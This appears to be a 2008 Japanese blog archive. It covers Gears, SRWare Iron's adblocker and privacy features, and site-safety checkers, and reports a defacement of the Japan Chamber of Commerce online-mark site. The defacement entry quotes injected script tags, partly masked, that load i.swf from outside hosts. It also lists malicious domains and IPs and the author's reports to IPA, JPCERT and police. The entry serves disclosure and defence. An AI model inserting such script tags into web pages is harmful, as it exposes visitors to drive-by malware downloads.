10月 2008のアーカイブ
Gears – Google Chrome and SRWare Iron
マイコミジャーナル
「Google Gears」から「Gears」へ、オフラインDB機能をさらに強化
http://journal.mycom.co.jp/news/2008/05/29/014/
によると、
Webアプリケーションのオフライン動作を可能にする技術「Google Gears」は2007年、開発者イベント「Google Developer Day 2007」のオーストラリア会場(シドニー)で初めて発表され、米Googleは2008年5月28日(現地時間)、名称「Google Gears」を「Gears」へと変更したことを発表した。オフライン動作のためのデータベースエンジンとしてSQLiteを内蔵している。
Googleのウェブアプリケーション「Reader」「Docs & Spreadsheets」などのオフライン利用時だけでなく、Google Chromeでは「アプリケーションのショートカットを作成する」操作時に、Gearsが起動する。
SRWare Iron もGearを利用する(まだ、名称「Google Gears」を使用)。ChromeとIronの両方がインストールされたプラットフォームでは、ときに一時的にどちらかでGearが起動しない不具合が発生した(OS Windows XP SP3)。
システム要件、利用できるブラウザ、(オフライン)データベースファイルの局在
http://gears.google.com/support/bin/answer.py?answer=79850
SRWare Iron – Adblocker
Adblocker integrated in Iron
【Adblocker 採用(組み込み、統合)】Chromiumベースのブラウザでは、SRWare Ironが世界初です。
ドイツ時間 2008/10/11
http://www.srware.net/en/software_srware_iron_news.php
最新バージョンの SRWare Iron の(デフォルト)ドライブ C:\Program Files\SRWare Iron\ 内にダウンロードしたフィルターリスト adblock.ini をコピーするだけです。
あらたな設定は不要のようです。ほぼすべての online advertising オンライン広告をフィルターします。
Google AdSense も当然、ブロックされます(AdSense 広告の表示なし)。
投稿者注:2008-10-13現在、SRWare Ironプログラム srware_iron.exeは初版バージョンではありません。最新版のインストールが必要です。
adblock.ini 26KB
# Iron Adblock list
# Version: 015B 19 Sept 2008
# License: http://creativecommons.org/licenses/by/2.5
# Based on: http://fanboy.co.nz/adblock
ハッシュ値
SHA-1
dad3ecd45cf35e23d8d73044d5c5918b282973a5
MD5
7865ad820ee35ed974f07e707c8097c9
SHA-256
9b8891ba71b8e48a8fcc68780e15659b4fe1e23bc1a8a07f32b6681607772035
クリエイティブ・コモンズのライセンスによると、フィルターは
http://creativecommons.org/licenses/by/3.0/deed.ja
相当です。
SRWare Iron – Privacy and Security
ソフトウェア会社 SRWare がドイツ以外の国にも提供しているSoftware「Iron」とは
・ A new Browser based on the Soucecode of Chromium
・ free and OpenSource
http://www.srware.net/en/software_srware_iron.php
Whats the difference beetwen Iron and Chrome?
http://www.srware.net/en/software_srware_iron_chrome_vs_iron.php
Privacyに関して
Client-ID
Timestamp
Suggest
Alternate Error Pages
Error Reporting
RLZ-Tracking
Google Updater
URL-Tracker
does not exist in Iron
SRWare Iron (525.19)と Google Chrome (525.13)とは、Securityに関係するWebKitのバージョン(括弧内)も違います。
2008-09-18 Iron 初版リリース Chromium 0.2.152.0
2008-10-10時点 同バージョン
(因みに、Google Chrome最新版 0.2.149.30)
英語、独語でのサポートですので、インストールしたGoogle Chromeを参照すればよいと思います。
(例)
Security
□ Enable phishing and malware protection
デフォルトではチェックがないので、ONに設定。
incognito windows (投稿者注 = Google Chrome日本語版 シークレット モード)
Serif Font: MS PMincho,16pt « Times New Roman, 16pt
San-Serif Font: MS PGothic, 16pt « Arial, 16pt
Fixed-width Font: MS Gothic, 13pt « Courier New, 13pt
McAfee SiteAdvisor – Norton Safe Web
オンラインで Web サイトの検査を行い、安全性について全体的な評価を行うサービスがあります。
McAfee SiteAdvisor
http://www.siteadvisor.com/
Norton Safe Web
http://safeweb.norton.com/
【感 想】
McAfee社:検査済みのことが多い。Symantec社:悪質なサイトの照合しやすい。
【その他】
トレンドマイクロ社:Trend プロテクト™「ウイルスバスター2008をすでにお使いで、オンラインユーザ登録がお済みのお客さまのみにご利用いただけるツールです。」
http://www.trendflexsecurity.jp/security_solutions/trendprotect.php
日本商工会議所オンラインマークの改ざん
日本商工会議所オンラインマーク総合センター
http://mark.cin.or.jp/
のオンラインマークが改ざんされており、
ページに不正なスクリプトが埋め込まれています。
マーク使用許可事業者の「オンラインマークの認証関係情報」
商工会議所オンラインマーク地域センターへのリンク中および地域センターの所在地の右端に挿入されています。
ユーザーのシステムに脆弱性があると、このコードによって実行可能ファイルが実行され、マルウェアがダウンロードされるかもしれません。オンラインマークは絶対にクリックしないで下さい。
2008-10-05 7 p.m.
ホームページの不正アクセスと改竄について下記へ連絡しました。
日本商工会議所オンラインマーク総合センター
メール連絡済 (第一報 Sun, 05 Oct 2008 12:05:51 +0900)
電話連絡済
情報処理推進機構(IPA)セキュリティセンター(ISEC)
http://www.ipa.go.jp/security/ciadr/index.html
留守電メッセージ済
メール連絡済 (受理 2008-10-06 ca 3 p.m.)
都道府県警察本部のサイバー犯罪相談窓口
http://www.npa.go.jp/cyber/soudan.htm
警視庁 長時間電話中で連絡不可
地元警察本部 電話で情報提供済
JPCERTコーディネーションセンター(JPCERT/CC)
http://www.jpcert.or.jp/
メール連絡済(受理 2008-10-06 11 a.m.)
[調査結果]
日本商工会議所オンラインマーク総合センター
オンラインマークの改ざんにより不正に挿入されているドメイン名
2008-10-07時点で、赤矢印の位置の"水平線"は表示されなくなりましたが、不正スクリプトは存在します。
drmyy.cn (2008-10-05 4 p.m. 時点の対応グロ-バルIP 211.154.163.43)
http://safeweb.norton.com/report/show?url=drmyy.cn&x=0&y=0
http://www.siteadvisor.com/sites/drmyy.cn/summary/
日本商工会議所オンラインマーク総合センターのサイト要素
に含まれていると思われるIPアドレス
ブラウザ Google Chrome (現時点での最新バージョン 0.2.149.30) BETAによる警告メッセージより
125.68.57.154 (2008-10-05 4 p.m. 時点の対応ドメイン ytgw123.cn)
http://safeweb.norton.com/report/show?url=ytgw123.cn&x=0&y=0
http://www.siteadvisor.com/sites/ytgw123.cn
[追記 2008-10-06]
地元の商工会議所へ電話連絡済
オンラインマークの認証関係情報
http://mark.cin.or.jp/database/cert-plug-inst.asp?markid=A00000-*-**
2008-10-06 10 p.m. 時点で未対応です。
[追記 2008-10-07]
不正スクリプトは削除されていません。
存在場所を示す"水平線"が表示されないように、サーバ内部で「改悪」処理が行われています。ブラウザで見た人は、不正スクリプトの要素に全く気づきません。
参照ページ:
「SQLインジェクションの仕組み――Webサイトに悪質コードを埋め込む」
http://itpro.nikkeibp.co.jp/article/COLUMN/20080930/315826/
改ざんの前後でWebサイトの外見が変化することはほとんどない。そのため,エンドユーザーが一見して改ざんに気づくことは難しい。
例外的に,HTML出力時にデータを(投稿者注:改ざん防止対策として)エスケープ処理していたり,タイトル・タグとなるデータが改ざんされたりした場合は,〈script src=http://www.example.com/ngg.js〉〈/script〉といったタグが文字列としてWebサイトに表示されることがある。
不正スクリプトは削除されました。9 p.m.
【急 告】再び、サーバ乗っ取り?によるオンライン認証関連情報ページの改ざん発見
2008-11-23 午前1時
閲覧者アクセスや検索ロボットの不正サイト登録を予防するため、一部***に変更しました。
【認証機関】日本<script src=http://61.31.***.114/i.swf></script><script src=http://****.co.kr/i.swf></script><script src=http://****.co.kr/i.swf></script>商工会議所オンラインマーク地域センター<br>〒100-0005 千代田区丸の内3-2-2<script src=http://61.31.***.114/i.swf></script><script src=http://****.co.kr/i.swf></script><script src=http://****.co.kr/i.swf></script>
同様の手口ですが、誘導するサイトが前回と異なります。
t**-n** (2008-11-23 9 a.m. 時点の対応グロ-バルIP 61.31.235.114)
Viruses Severity: High
http://safeweb.norton.com/report/show?url=61.31.235.114&x=0&y=0
http://www.siteadvisor.com/sites/61.31.235.114/summary/
ipkn.co.kr/i.swf (2008-11-23 9 a.m. 時点の対応グロ-バルIP 211.***.62.32)
http://safeweb.norton.com/report/show?url=ipkn.co.kri/
http://www.siteadvisor.com/sites/ipkn.co.kri/
ブラウザ Google Chrome (現時点での最新バージョン 0.3.154.9) BETAによる警告メッセージより
[追記 2008-11-27] 本日 10 a.m. 当該ページの不正スクリプト削除済確認
